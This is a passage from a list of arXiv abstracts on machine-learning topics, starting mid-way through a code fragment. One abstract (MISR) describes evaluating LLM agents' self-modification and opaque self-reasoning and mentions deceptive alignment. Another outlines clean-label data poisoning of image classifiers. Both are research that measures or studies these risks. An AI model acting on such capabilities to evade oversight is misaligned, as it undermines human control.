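        n_keep = int(len(inv_freq) * keep_ratio)
        inv_freq = inv_freq[:n_keep]                 # retain high-frequency signals only
        pos = torch.arange(seq_len).float()
        return torch.outer(pos, inv_freq)            # (seq_len, n_keep) rotation angles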
MT3DNet: Multi-Task learning Network for 3D Surgical Scene Reconstruction
In image-assisted minimally invasive surgeries (MIS), understanding surgical scenes is vital for real-time feedback to surgeons, skill evaluation, and improving outcomes through collaborative human-robot procedures. Within this context, the challenge lies in accurately detecting, segmenting, and estimating the depth of surgical scenes depicted in high-resolution images, while simultaneously reconstructing the scene in 3D and providing segmentation of surgical instruments along with detection labels for each instrument. To address this challenge, a novel Multi-Task Learning (MTL) network is proposed for performing these tasks concurrently. A key aspect of this approach involves overcoming the optimization hurdles associated with handling multiple tasks concurrently by integrating a Adversarial Weight Update into the MTL framework, the proposed MTL model achieves 3D reconstruction through the integration of segmentation, depth estimation, and object detection, thereby enhancing the understanding of surgical scenes, which marks a significant advancement compared to existing studies that lack 3D capabilities. Comprehensive experiments on the EndoVis2018 benchmark dataset underscore the adeptness of the model in efficiently addressing all three tasks, demonstrating the efficacy of the proposed techniques.
Updated: 2024-12-05 07:07:35
Categories: cs.CV,cs.AI,cs.HC,cs.LG
MegaCOIN: Enhancing Medium-Grained Color Perception for Vision-Language Models
In vision-language models (VLMs), the ability to perceive and interpret color and physical environment is crucial for achieving contextually accurate understanding and interaction. However, despite advances in multimodal modeling, there remains a significant lack of specialized datasets that rigorously evaluate a model's capacity to discern subtle color variations and spatial context -- critical elements for situational comprehension and reliable deployment across real-world applications. Toward that goal, we curate MegaCOIN, a high-quality, human-labeled dataset based on real images with various contextual attributes. MegaCOIN consists of two parts: MegaCOIN-Instruct, which serves as a supervised fine-tuning (SFT) dataset for VLMs; and MegaCOIN-Bench, an annotated test set that can be used as a stand-alone QA dataset. MegaCOIN provides three annotated features for 220,000 real images: foreground color, background color, and description of an object's physical environment, constituting 660k human annotations. In addition, MegaCOIN can be applied to benchmark domain generalization (DG) algorithms. We explore benchmarking DG methods in the linear probing setup for VLM and show some new insights. Last but not least, we show that VLMs, including GPT-4o, have subpar color recognition capabilities, and fine-tuning with MegaCOIN can result in improved performance on visual evaluation tasks. In certain cases, MegaCOIN fine-tuned small-scale open-source models such as LLaVA and Bunny can outperform closed-source GPT-4o. We hope the utilities of MegaCOIN can shed light on the directions VLMs can improve and provide a more complex platform for domain generalization algorithms.
Updated: 2024-12-05 07:06:17
Categories: cs.CV,cs.LG
ToolEyes: Fine-Grained Evaluation for Tool Learning Capabilities of Large Language Models in Real-world Scenarios
Existing evaluations of tool learning primarily focus on validating the alignment of selected tools for large language models (LLMs) with expected outcomes. However, these approaches rely on a limited set of scenarios where answers can be pre-determined, diverging from genuine needs. Furthermore, a sole emphasis on outcomes disregards the complex capabilities required for LLMs to effectively use tools. To tackle this issue, we propose ToolEyes, a fine-grained system tailored for the evaluation of the LLMs' tool learning capabilities in authentic scenarios. The system meticulously examines seven real-world scenarios, analyzing five dimensions crucial to LLMs in tool learning: format alignment, intent comprehension, behavior planning, tool selection, and answer organization. Additionally, ToolEyes incorporates a tool library boasting approximately 600 tools, serving as an intermediary between LLMs and the physical world. Evaluations involving ten LLMs across three categories reveal a preference for specific scenarios and limited cognitive abilities in tool learning. Intriguingly, expanding the model size even exacerbates the hindrance to tool learning. The code and data are available at https://github.com/Junjie-Ye/ToolEyes.
Updated: 2024-12-05 07:05:59
Categories: cs.CL,cs.AI
LuxEmbedder: A Cross-Lingual Approach to Enhanced Luxembourgish Sentence Embeddings
Sentence embedding models play a key role in various Natural Language Processing tasks, such as in Topic Modeling, Document Clustering and Recommendation Systems. However, these models rely heavily on parallel data, which can be scarce for many low-resource languages, including Luxembourgish. This scarcity results in suboptimal performance of monolingual and cross-lingual sentence embedding models for these languages. To address this issue, we compile a relatively small but high-quality human-generated cross-lingual parallel dataset to train LuxEmbedder, an enhanced sentence embedding model for Luxembourgish with strong cross-lingual capabilities. Additionally, we present evidence suggesting that including low-resource languages in parallel training datasets can be more advantageous for other low-resource languages than relying solely on high-resource language pairs. Furthermore, recognizing the lack of sentence embedding benchmarks for low-resource languages, we create a paraphrase detection benchmark specifically for Luxembourgish, aiming to partially fill this gap and promote further research.
Updated: 2024-12-05 07:05:57
Categories: cs.CL,cs.AI
Traffic Co-Simulation Framework Empowered by Infrastructure Camera Sensing and Reinforcement Learning
Traffic simulations are commonly used to optimize traffic flow, with reinforcement learning (RL) showing promising potential for automated traffic signal control. Multi-agent reinforcement learning (MARL) is particularly effective for learning control strategies for traffic lights in a network using iterative simulations. However, existing methods often assume perfect vehicle detection, which overlooks real-world limitations related to infrastructure availability and sensor reliability. This study proposes a co-simulation framework integrating CARLA and SUMO, which combines high-fidelity 3D modeling with large-scale traffic flow simulation. Cameras mounted on traffic light poles within the CARLA environment use a YOLO-based computer vision system to detect and count vehicles, providing real-time traffic data as input for adaptive signal control in SUMO. MARL agents, trained with four different reward structures, leverage this visual feedback to optimize signal timings and improve network-wide traffic flow. Experiments in the test-bed demonstrate the effectiveness of the proposed MARL approach in enhancing traffic conditions using real-time camera-based detection. The framework also evaluates the robustness of MARL under faulty or sparse sensing and compares the performance of YOLOv5 and YOLOv8 for vehicle detection. Results show that while better accuracy improves performance, MARL agents can still achieve significant improvements with imperfect detection, demonstrating adaptability for real-world scenarios.
Updated: 2024-12-05 07:01:56
Categories: eess.SY,cs.LG,cs.SY,eess.IV
OMEGA: Efficient Occlusion-Aware Navigation for Air-Ground Robot in Dynamic Environments via State Space Model
Air-ground robots (AGRs) are widely used in surveillance and disaster response due to their exceptional mobility and versatility (i.e., flying and driving). Current AGR navigation systems perform well in static occlusion-prone environments (e.g., indoors) by using 3D semantic occupancy networks to predict occlusions for complete local mapping and then computing Euclidean Signed Distance Field (ESDF) for path planning. However, these systems face challenges in dynamic, severe occlusion scenes (e.g., crowds) due to limitations in perception networks' low prediction accuracy and path planners' high computation overhead. In this paper, we propose OMEGA, which contains OccMamba with an Efficient AGR-Planner to address the above-mentioned problems. OccMamba adopts a novel architecture that separates semantic and occupancy prediction into independent branches, incorporating two mamba blocks within these branches. These blocks efficiently extract semantic and geometric features in 3D environments with linear complexity, ensuring that the network can learn long-distance dependencies to improve prediction accuracy. Semantic and geometric features are combined within the Bird's Eye View (BEV) space to minimise computational overhead during feature fusion. The resulting semantic occupancy map is then seamlessly integrated into the local map, providing occlusion awareness of the dynamic environment. Our AGR-Planner utilizes this local map and employs kinodynamic A* search and gradient-based trajectory optimization to guarantee planning is ESDF-free and energy-efficient. Extensive experiments demonstrate that OccMamba outperforms the state-of-the-art 3D semantic occupancy network with 25.0% mIoU. End-to-end navigation experiments in dynamic scenes verify OMEGA's efficiency, achieving a 96% average planning success rate. Code and video are available at https://jmwang0117.github.io/OMEGA/.
Updated: 2024-12-05 06:54:29
Categories: cs.RO,cs.AI,cs.CV
Concept Based Continuous Prompts for Interpretable Text Classification
Continuous prompts have become widely adopted for augmenting performance across a wide range of natural language tasks. However, the underlying mechanism of this enhancement remains obscure. Previous studies rely on individual words for interpreting continuous prompts, which lacks comprehensive semantic understanding. Drawing inspiration from Concept Bottleneck Models, we propose a framework for interpreting continuous prompts by decomposing them into human-readable concepts. Specifically, to ensure the feasibility of the decomposition, we demonstrate that a corresponding concept embedding matrix and a coefficient matrix can always be found to replace the prompt embedding matrix. Then, we employ GPT-4o to generate a concept pool and choose potential candidate concepts that are discriminative and representative using a novel submodular optimization algorithm. Experiments demonstrate that our framework can achieve similar results as the original P-tuning and word-based approaches using only a few concepts while providing more plausible results. Our code is available at https://github.com/qq31415926/CD.
Updated: 2024-12-05 06:49:37
Categories: cs.CL,cs.AI
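The feasibility claim is easy to check numerically: a prompt embedding matrix P can always be factored through a concept embedding matrix C with a coefficient matrix W. The sketch below recovers W by ordinary least squares; the paper selects which concepts populate C via submodular optimization over a GPT-4o-generated pool, which is not shown, and all shapes here are illustrative.

    import torch

    m, d, k = 8, 768, 16
    P = torch.randn(m, d)          # continuous prompt to interpret (m soft tokens)
    C = torch.randn(k, d)          # embeddings of k human-readable concepts
    # solve P ~ W @ C, i.e. C^T W^T = P^T in least-squares form
    W = torch.linalg.lstsq(C.t(), P.t()).solution.t()
    print(torch.dist(P, W @ C))    # residual; small when the pool spans the prompt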
Diffusion of Thoughts: Chain-of-Thought Reasoning in Diffusion Language Models
Recently, diffusion models have garnered significant interest in the field of text processing due to their many potential advantages compared to conventional autoregressive models. In this work, we propose Diffusion-of-Thought (DoT), a novel approach that integrates diffusion models with Chain-of-Thought, a well-established technique for improving the reasoning ability of autoregressive language models. In contrast to autoregressive language models that make decisions in a left-to-right, token-by-token manner, DoT allows reasoning steps to diffuse over time through a diffusion language model and offers greater flexibility in trading-off computation for reasoning performance. Our experimental results demonstrate the effectiveness of DoT in multi-digit multiplication, boolean logic, and grade school math problems, with a small diffusion model outperforming a much larger autoregressive model in both efficiency and accuracy. In addition to that, DoT showcases promising self-correction abilities and benefits from existing reasoning-enhancing techniques like self-consistency decoding. Our findings contribute to the understanding and development of reasoning with diffusion language models.
Updated: 2024-12-05 06:49:06
Categories: cs.CL,cs.AI,cs.LG
A Survey on Large Language Model-Based Social Agents in Game-Theoretic Scenarios
Game-theoretic scenarios have become pivotal in evaluating the social intelligence of Large Language Model (LLM)-based social agents. While numerous studies have explored these agents in such settings, there is a lack of a comprehensive survey summarizing the current progress. To address this gap, we systematically review existing research on LLM-based social agents within game-theoretic scenarios. Our survey organizes the findings into three core components: Game Framework, Social Agent, and Evaluation Protocol. The game framework encompasses diverse game scenarios, ranging from choice-focusing to communication-focusing games. The social agent part explores agents' preferences, beliefs, and reasoning abilities. The evaluation protocol covers both game-agnostic and game-specific metrics for assessing agent performance. By reflecting on the current research and identifying future research directions, this survey provides insights to advance the development and evaluation of social agents in game-theoretic scenarios.
Updated: 2024-12-05 06:46:46
Categories: cs.CL,cs.AI
Techniques for Measuring the Inferential Strength of Forgetting Policies
The technique of forgetting in knowledge representation has been shown to be a powerful and useful knowledge engineering tool with widespread application. Yet, very little research has been done on how different policies of forgetting, or use of different forgetting operators, affects the inferential strength of the original theory. The goal of this paper is to define loss functions for measuring changes in inferential strength based on intuitions from model counting and probability theory. Properties of such loss measures are studied and a pragmatic knowledge engineering tool is proposed for computing loss measures using ProbLog. The paper includes a working methodology for studying and determining the strength of different forgetting policies, in addition to concrete examples showing how to apply the theoretical results using ProbLog. Although the focus is on forgetting, the results are much more general and should have wider application to other areas.
Updated: 2024-12-05 06:38:13
Domains: cs.AI,cs.LO
Quantized and Interpretable Learning Scheme for Deep Neural Networks in Classification Task
Deep learning techniques have proven highly effective in image classification, but their deployment in resource-constrained environments remains challenging due to high computational demands. Furthermore, their interpretability is of high importance, and achieving it typically demands even more resources. In this work, we introduce an approach that combines saliency-guided training with quantization techniques to create an interpretable and resource-efficient model without compromising accuracy. We utilize Parameterized Clipping Activation (PACT) to perform quantization-aware training, specifically targeting activations and weights to optimize precision while minimizing resource usage. Concurrently, saliency-guided training is employed to enhance interpretability by iteratively masking features with low gradient values, leading to more focused and meaningful saliency maps. This training procedure helps mitigate noisy gradients and yields models that provide clearer, more interpretable insights into their decision-making processes. To evaluate the impact of our approach, we conduct experiments using well-known Convolutional Neural Network (CNN) architectures on the MNIST and CIFAR-10 benchmark datasets. We compare the saliency maps generated by standard and quantized models to assess the influence of quantization on both interpretability and classification accuracy. Our results demonstrate that the combined use of saliency-guided training and PACT-based quantization not only maintains classification performance but also produces models that are significantly more efficient and interpretable, making them suitable for deployment in resource-limited settings.
Updated: 2024-12-05 06:34:06
Domains: cs.LG,cs.CV
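The PACT mechanism above is concrete enough to sketch. Below is a minimal PyTorch illustration, not the authors' code: activations are clipped to a learnable bound alpha, uniformly quantized to k bits, and a straight-through estimator carries gradients through the rounding step. The bit-width, initialization, and toy input are illustrative assumptions.

```python
import torch
import torch.nn as nn

class PACT(nn.Module):
    """Parameterized Clipping Activation: clip to a learnable bound alpha,
    then uniformly quantize to k bits (straight-through estimator)."""
    def __init__(self, k_bits=4, init_alpha=6.0):
        super().__init__()
        self.k_bits = k_bits
        self.alpha = nn.Parameter(torch.tensor(init_alpha))

    def forward(self, x):
        # Clip to [0, alpha]; gradients w.r.t. alpha flow through the clip.
        y = torch.clamp(x, min=0.0) - torch.clamp(x - self.alpha, min=0.0)
        # Uniform quantization onto 2^k - 1 levels in [0, alpha].
        scale = (2 ** self.k_bits - 1) / self.alpha
        y_q = torch.round(y * scale) / scale
        # Straight-through estimator: forward uses y_q, backward sees y.
        return y + (y_q - y).detach()

act = PACT(k_bits=4)
out = act(torch.randn(8, 16) * 3)
print(out.unique().numel(), "distinct activation levels")  # at most 2^4
```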
Graph Disentangle Causal Model: Enhancing Causal Inference in Networked Observational Data
Estimating individual treatment effects (ITE) from observational data is a critical task across various domains. However, many existing works on ITE estimation overlook the influence of hidden confounders, which remain unobserved at the individual unit level. To address this limitation, researchers have utilized graph neural networks to aggregate neighbors' features to capture the hidden confounders and mitigate confounding bias by minimizing the discrepancy of confounder representations between the treated and control groups. Despite the success of these approaches, practical scenarios often treat all features as confounders and involve substantial differences in feature distributions between the treated and control groups. Conflating adjustment variables with confounders and enforcing strict balance on the confounder representations can undermine the effectiveness of outcome prediction. To mitigate this issue, we propose a novel framework called the Graph Disentangle Causal model (GDC) to conduct ITE estimation in the network setting. GDC utilizes a causal disentangle module to separate unit features into adjustment and confounder representations. Then we design a graph aggregation module consisting of three distinct graph aggregators to obtain adjustment, confounder, and counterfactual confounder representations. Finally, a causal constraint module is employed to enforce the disentangled representations as true causal factors. The effectiveness of our proposed method is demonstrated by conducting comprehensive experiments on two networked datasets.
Updated: 2024-12-05 06:30:20
Domains: cs.LG,cs.IR
Separate, Dynamic and Differentiable (SMART) Pruner for Block/Output Channel Pruning on Computer Vision Tasks
Block pruning, which eliminates contiguous blocks of weights, is a structural pruning method that can significantly enhance the performance of neural processing units (NPUs). In industrial applications, an ideal block pruning algorithm should meet three key requirements: (1) maintain high accuracy across diverse models and tasks, as machine learning deployments on edge devices are typically accuracy-critical; (2) offer precise control over resource constraints to facilitate user adoption; and (3) provide convergence guarantees to prevent performance instability. However, to the best of our knowledge, no existing block pruning algorithm satisfies all three requirements simultaneously. In this paper, we introduce SMART (Separate, Dynamic, and Differentiable) pruning, a novel algorithm designed to address this gap. SMART leverages both weight and activation information to enhance accuracy, employs a differentiable top-k operator for precise control of resource constraints, and offers convergence guarantees under mild conditions. Extensive experiments involving seven models, four datasets, three different block types, and three computer vision tasks demonstrate that SMART pruning achieves state-of-the-art performance in block pruning.
Updated: 2024-12-05 06:29:07
Domains: cs.CV,cs.LG
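The differentiable top-k operator is the load-bearing piece here. The sketch below shows one generic way to realize such an operator in PyTorch: a temperature-controlled sigmoid whose threshold is found by bisection to meet the block budget. SMART's actual operator and its block parameterization may differ; this is only an illustration of the idea.

```python
import torch

def soft_topk_mask(scores, k, temperature=0.1, iters=30):
    """A generic differentiable relaxation of a top-k mask: bisection finds
    a threshold tau so the soft mask sums to ~k; gradients reach `scores`
    through the final sigmoid."""
    with torch.no_grad():
        s = scores.detach()
        lo, hi = s.min() - 1.0, s.max() + 1.0
        for _ in range(iters):
            tau = (lo + hi) / 2
            if torch.sigmoid((s - tau) / temperature).sum() > k:
                lo = tau          # mask too large: raise the threshold
            else:
                hi = tau
    return torch.sigmoid((scores - tau) / temperature)

# Importance scores for 10 weight blocks; keep a budget of 3 blocks.
scores = torch.randn(10, requires_grad=True)
mask = soft_topk_mask(scores, k=3)
print(mask.detach().round())   # roughly 3 surviving blocks
mask.sum().backward()          # gradients flow back to the scores
print(scores.grad is not None)
```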
Objective Features Extracted from Motor Activity Time Series for Food Addiction Analysis Using Machine Learning
This study investigates machine learning algorithms to identify objective features for diagnosing food addiction (FA) and assessing confirmed symptoms (SC). Data were collected from 81 participants (mean age: 21.5 years, range: 18-61 years, women: 77.8%) whose FA and SC were measured using the Yale Food Addiction Scale (YFAS). Participants provided demographic and anthropometric data, completed the YFAS, the Zung Self-Rating Depression Scale, and the Dutch Eating Behavior Questionnaire, and wore an actimeter on the non-dominant wrist for a week to record motor activity. Analysis of the actimetric data identified significant statistical and entropy-based features that accurately predicted FA and SC using ML. The Matthews correlation coefficient (MCC) was the primary metric. Activity-related features were more effective for FA prediction (MCC=0.88) than rest-related features (MCC=0.68). For SC, activity segments yielded MCC=0.47, rest segments MCC=0.38, and their combination MCC=0.51. Significant correlations were also found between actimetric features related to FA, emotional, and restrained eating behaviors, supporting the model's validity. Our results support the concept of a human bionic suite composed of IoT devices and ML sensors, which implements health digital assistance with real-time monitoring and analysis of physiological indicators related to FA and SC.
Updated: 2024-12-05 06:28:11
Domains: cs.LG,cs.AI,eess.SP,physics.med-ph
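As a toy illustration of the pipeline described above (statistical features extracted from actimetry series, fed to a classifier, scored by MCC), here is a sketch on synthetic data; the feature set, classifier, and data generator are stand-ins, not the study's.

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import matthews_corrcoef
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(0)

def features(activity):
    """Toy statistical features of a 1-D motor-activity series (stand-ins
    for the study's statistical and entropy-based features)."""
    return [activity.mean(), activity.std(), np.median(activity),
            np.percentile(activity, 90), (np.diff(activity) ** 2).mean()]

# Synthetic week-long traces (10080 minutes) for 81 "participants".
labels = rng.integers(0, 2, size=81)                 # 1 = FA, 0 = no FA
X = np.array([features(rng.gamma(2.0, 1.0 + 0.5 * y, size=10080))
              for y in labels])

X_tr, X_te, y_tr, y_te = train_test_split(X, labels, random_state=0)
clf = RandomForestClassifier(random_state=0).fit(X_tr, y_tr)
print("MCC:", matthews_corrcoef(y_te, clf.predict(X_te)))
```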
Can Targeted Clean-Label Poisoning Attacks Generalize?
Targeted poisoning attacks aim to compromise the model's prediction on specific target samples. In a common clean-label setting, they are achieved by slightly perturbing a subset of training samples given access to those specific targets. Despite continuous efforts, it remains unexplored whether such attacks can generalize to unknown variations of those targets. In this paper, we take the first step to systematically study this generalization problem. Observing that the widely adopted, cosine similarity-based attack exhibits limited generalizability, we propose a well-generalizable attack that leverages both the direction and magnitude of model gradients. In particular, we explore diverse target variations, such as an object with varied viewpoints and an animal species with distinct appearances. Extensive experiments across various generalization scenarios demonstrate that our method consistently achieves the best attack effectiveness. For example, our method outperforms the cosine similarity-based attack by 20.95% in attack success rate with similar overall accuracy, averaged over four models on two image benchmark datasets. The code is available at https://github.com/jiaangk/generalizable_tcpa
Updated: 2024-12-05 06:27:14
Domains: cs.CV,cs.CR,cs.LG
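A sketch of the core idea, matching both the direction and the magnitude of model gradients when crafting clean-label perturbations, is shown below. The toy model, loss weighting, and perturbation budget are illustrative assumptions, not the paper's exact formulation.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

torch.manual_seed(0)
model = nn.Sequential(nn.Linear(32, 64), nn.ReLU(), nn.Linear(64, 10))
params = list(model.parameters())
target_x, target_y = torch.randn(1, 32), torch.tensor([3])  # adversarial label
poison_x = torch.randn(8, 32)                               # clean-label poisons
poison_y = torch.randint(0, 10, (8,))
delta = torch.zeros_like(poison_x, requires_grad=True)
opt = torch.optim.Adam([delta], lr=0.01)
eps = 0.05                                                  # perturbation budget

def grad_vector(x, y):
    loss = F.cross_entropy(model(x), y)
    return torch.cat([g.flatten()
                      for g in torch.autograd.grad(loss, params, create_graph=True)])

g_target = grad_vector(target_x, target_y).detach()
for step in range(100):
    g_poison = grad_vector(poison_x + delta, poison_y)
    cos = F.cosine_similarity(g_poison, g_target, dim=0)               # direction
    mag = (g_poison.norm() - g_target.norm()).abs() / g_target.norm()  # magnitude
    loss = (1 - cos) + 0.1 * mag
    opt.zero_grad()
    loss.backward()
    opt.step()
    with torch.no_grad():
        delta.clamp_(-eps, eps)   # keep the poisons visually clean
print("gradient alignment:", cos.item())
```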
Final-Model-Only Data Attribution with a Unifying View of Gradient-Based Methods
Training data attribution (TDA) is the task of attributing model behavior to elements in the training data. This paper draws attention to the common setting where one has access only to the final trained model, and not the training algorithm or intermediate information from training. To serve as a gold standard for TDA in this "final-model-only" setting, we propose further training, with appropriate adjustment and averaging, to measure the sensitivity of the given model to training instances. We then unify existing gradient-based methods for TDA by showing that they all approximate the further training gold standard in different ways. We investigate empirically the quality of these gradient-based approximations to further training, for tabular, image, and text datasets and models. We find that the approximation quality of first-order methods is sometimes high but decays with the amount of further training. In contrast, the approximations given by influence function methods are more stable but surprisingly lower in quality.
Updated: 2024-12-05 06:24:26
Domains: cs.LG,stat.ML
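The first-order gradient approximation discussed above can be written in a few lines: score each training point by the inner product of its gradient with the test point's gradient, both taken at the final model (a single-checkpoint, TracIn-style variant). The toy model and data below are placeholders.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

torch.manual_seed(0)
model = nn.Linear(10, 2)                   # stand-in for the final model
train_x, train_y = torch.randn(100, 10), torch.randint(0, 2, (100,))
test_x, test_y = torch.randn(1, 10), torch.tensor([1])

def flat_grad(x, y):
    loss = F.cross_entropy(model(x), y)
    return torch.cat([g.flatten()
                      for g in torch.autograd.grad(loss, model.parameters())])

g_test = flat_grad(test_x, test_y)
# First-order attribution: inner product of each training example's
# gradient with the test gradient, all evaluated at the final model.
scores = torch.stack([g_test @ flat_grad(train_x[i:i + 1], train_y[i:i + 1])
                      for i in range(len(train_x))])
print("most influential points:", scores.topk(5).indices.tolist())
```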
Integrating Various Software Artifacts for Better LLM-based Bug Localization and Program Repair
LLMs have garnered considerable attention for their potential to streamline Automated Program Repair (APR). LLM-based approaches can either insert the correct code or directly generate patches when provided with buggy methods. However, most LLM-based APR methods rely on a single type of software information, without fully leveraging different software artifacts. Despite this, many LLM-based approaches do not explore which specific types of information best assist in APR. Addressing this gap is crucial for advancing LLM-based APR techniques. We propose DEVLoRe, which uses issue content (description and message) and stack error traces to localize buggy methods, then relies on debug information in buggy methods together with issue content and stack error traces to localize buggy lines and generate plausible patches that can pass all unit tests. The results show that while issue content is particularly effective in assisting LLMs with fault localization and program repair, different types of software artifacts complement each other. By incorporating different artifacts, DEVLoRe successfully locates 49.3% and 47.6% of single and non-single buggy methods and generates 56.0% and 14.5% plausible patches for the Defects4J v2.0 dataset, respectively. This outperforms current state-of-the-art APR methods. The source code and experimental results of this work for replication are available at https://github.com/XYZboom/DEVLoRe.
Updated: 2024-12-05 06:21:31
Domains: cs.SE,cs.AI
Embed-Search-Align: DNA Sequence Alignment using Transformer Models
DNA sequence alignment involves assigning short DNA reads to the most probable locations on an extensive reference genome. This process is crucial for various genomic analyses, including variant calling, transcriptomics, and epigenomics. Conventional methods, refined over decades, tackle this challenge in 2 steps: genome indexing followed by efficient search to locate likely positions for given reads. Building on the success of Large Language Models in encoding text into embeddings, where the distance metric captures semantic similarity, recent efforts have explored whether the same Transformer architecture can produce embeddings for DNA sequences. Such models have shown early promise in classifying short DNA sequences, such as detecting coding/non-coding regions, and enhancer, promoter sequences. However, performance at sequence classification tasks does not translate to sequence alignment, where it is necessary to search across the genome to align each read, a significantly longer-range task. We bridge this gap by framing the Sequence Alignment task for Transformer models as an "Embed-Search-Align" task. In this framework, a novel Reference-Free DNA Embedding model generates embeddings of reads and reference fragments, which are projected into a shared vector space where the read-fragment distance is used as a surrogate for alignment. Technical contributions include: (1) Contrastive loss for self-supervised training of DNA sequence representations, facilitating rich reference-free, sequence-level embeddings, and (2) a DNA vector store to enable search across fragments on a global scale. DNA-ESA is 99% accurate when aligning 250-length reads onto a human genome (3gb), rivaling conventional methods such as Bowtie and BWA-Mem. DNA-ESA exceeds the performance of 6 Transformer model baselines such as Nucleotide Transformer, Hyena-DNA, and shows task transfer across chromosomes and species.
Updated: 2024-12-05 06:21:03
Domains: q-bio.GN,cs.AI
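The embed-search-align recipe is easy to prototype. The sketch below swaps the paper's Transformer encoder for a toy hashed k-mer embedding (a clearly labeled stand-in) but keeps the structure: embed overlapping reference fragments into a vector store, retrieve the closest fragment for a read by cosine similarity, then fine-align within the hit.

```python
import numpy as np

rng = np.random.default_rng(0)

def embed(seq, dim=64):
    """Hypothetical stand-in for the paper's Transformer encoder:
    hashed 6-mer counts, L2-normalized. (Python's str hash is stable
    within one process, which is all we need here.)"""
    v = np.zeros(dim)
    for i in range(len(seq) - 5):
        v[hash(seq[i:i + 6]) % dim] += 1.0
    return v / (np.linalg.norm(v) + 1e-9)

# Vector store: overlapping reference fragments and their embeddings.
reference = "".join(rng.choice(list("ACGT"), size=10_000))
frag_len, stride = 1000, 500
frags = [(pos, reference[pos:pos + frag_len])
         for pos in range(0, len(reference) - frag_len + 1, stride)]
index = np.stack([embed(f) for _, f in frags])

# Align a 250-bp read: embed, search the store, fine-align within the hit.
true_pos = 4321
read = reference[true_pos:true_pos + 250]
hit_pos, hit_seq = frags[int(np.argmax(index @ embed(read)))]
offset = max(range(len(hit_seq) - 249),
             key=lambda o: sum(a == b for a, b in zip(hit_seq[o:o + 250], read)))
print("true:", true_pos, "estimated:", hit_pos + offset)
```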
MISR: Measuring Instrumental Self-Reasoning in Frontier Models
We propose a suite of tasks to evaluate the instrumental self-reasoning ability of large language model (LLM) agents. Instrumental self-reasoning ability could improve adaptability and enable self-modification, but it could also pose significant risks, such as enabling deceptive alignment. Prior work has only evaluated self-reasoning in non-agentic settings or in limited domains. In this paper, we propose evaluations for instrumental self-reasoning ability in agentic tasks in a wide range of scenarios, including self-modification, knowledge seeking, and opaque self-reasoning. We evaluate agents built using state-of-the-art LLMs, including commercial and open source systems. We find that instrumental self-reasoning ability emerges only in the most capable frontier models and that it is highly context-dependent. No model passes the most difficult versions of our evaluations, hence our evaluation can be used to measure increases in instrumental self-reasoning ability in future models. We open-source our evaluations at https://github.com/kaifronsdal/Self-Reasoning-Evals.
Updated: 2024-12-05 06:20:47
Domains: cs.AI,cs.CL,cs.LG,I.2.7
Using SlowFast Networks for Near-Miss Incident Analysis in Dashcam Videos
This paper classifies near-miss traffic videos using the SlowFast deep neural network that mimics the characteristics of the slow and fast visual information processed by two different streams from the M (Magnocellular) and P (Parvocellular) cells of the human brain. The approach significantly improves the accuracy of the traffic near-miss video analysis and presents insights into human visual perception in traffic scenarios. Moreover, it contributes to traffic safety enhancements and provides novel perspectives on the potential cognitive errors in traffic accidents.
Updated: 2024-12-05 06:20:19
Domains: cs.AI
Multisource Collaborative Domain Generalization for Cross-Scene Remote Sensing Image Classification
Cross-scene image classification aims to transfer prior knowledge of ground materials to annotate regions with different distributions and reduce hand-crafted cost in the field of remote sensing. However, existing approaches focus on single-source domain generalization to unseen target domains, and are easily confused by large real-world domain shifts due to the limited training information and insufficient diversity modeling capacity. To address this gap, we propose a novel multi-source collaborative domain generalization framework (MS-CDG) based on homogeneity and heterogeneity characteristics of multi-source remote sensing data, which considers data-aware adversarial augmentation and model-aware multi-level diversification simultaneously to enhance cross-scene generalization performance. The data-aware adversarial augmentation adopts an adversary neural network with semantic guide to generate MS samples by adaptively learning realistic channel and distribution changes across domains. In views of cross-domain and intra-domain modeling, the model-aware diversification transforms the shared spatial-channel features of MS data into the class-wise prototype and kernel mixture module, to address domain discrepancies and cluster different classes effectively. Finally, the joint classification of original and augmented MS samples is employed by introducing a distribution consistency alignment to increase model diversity and ensure better domain-invariant representation learning. Extensive experiments on three public MS remote sensing datasets demonstrate the superior performance of the proposed method when benchmarked with the state-of-the-art methods.
Updated: 2024-12-05 06:15:08
Domains: cs.CV,cs.LG
A Noise is Worth Diffusion Guidance
Diffusion models excel in generating high-quality images. However, current diffusion models struggle to produce reliable images without guidance methods, such as classifier-free guidance (CFG). Are guidance methods truly necessary? Observing that noise obtained via diffusion inversion can reconstruct high-quality images without guidance, we focus on the initial noise of the denoising pipeline. By mapping Gaussian noise to "guidance-free noise", we uncover that small low-magnitude low-frequency components significantly enhance the denoising process, removing the need for guidance and thus improving both inference throughput and memory usage. Expanding on this, we propose NoiseRefine, a novel method that replaces guidance methods with a single refinement of the initial noise. This refined noise enables high-quality image generation without guidance, within the same diffusion pipeline. Our noise-refining model leverages efficient noise-space learning, achieving rapid convergence and strong performance with just 50K text-image pairs. We validate its effectiveness across diverse metrics and analyze how refined noise can eliminate the need for guidance. See our project page: https://cvlab-kaist.github.io/NoiseRefine/.
Updated: 2024-12-05 06:09:56
Domains: cs.CV,cs.AI,cs.LG
Machine Learning-based Android Intrusion Detection System
The Android operating system is installed on most smart devices, and intrusions targeting it are rising at a tremendous rate. With the introduction of such malicious data streams, smart devices are subjected to various attacks such as phishing, spyware, SMS fraud, bots, and banking Trojans. This paper applies machine learning classification algorithms to the security of Android APK files. Each APK data stream was labeled as either malicious or non-malicious on the basis of different parameters. Machine learning classification techniques are then used to determine whether a newly installed application's signature falls within the malicious or non-malicious domain. If it falls within the malicious category, appropriate action can be taken, and the Android operating system can be shielded against illegal activities.
Updated: 2024-12-05 06:05:12
Domains: cs.LG,cs.AI
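As a minimal sketch of the described pipeline (binary APK features labeled malicious or non-malicious, fed to a classifier), consider the following; the permission-flag features and the rule generating the labels are synthetic stand-ins, not the paper's data.

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import classification_report
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(42)

# Toy APK feature vectors: binary flags for requested permissions and API
# calls (e.g. SEND_SMS, READ_CONTACTS). Real pipelines extract these from
# the manifest and bytecode.
X = rng.integers(0, 2, size=(1000, 20))
# Synthetic labeling rule: malware tends to request the first 3 risky flags.
y = (X[:, :3].sum(axis=1) + rng.normal(0, 0.5, 1000) > 2).astype(int)

X_tr, X_te, y_tr, y_te = train_test_split(X, y, random_state=0)
clf = RandomForestClassifier(n_estimators=100, random_state=0).fit(X_tr, y_tr)
print(classification_report(y_te, clf.predict(X_te),
                            target_names=["benign", "malicious"]))
```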
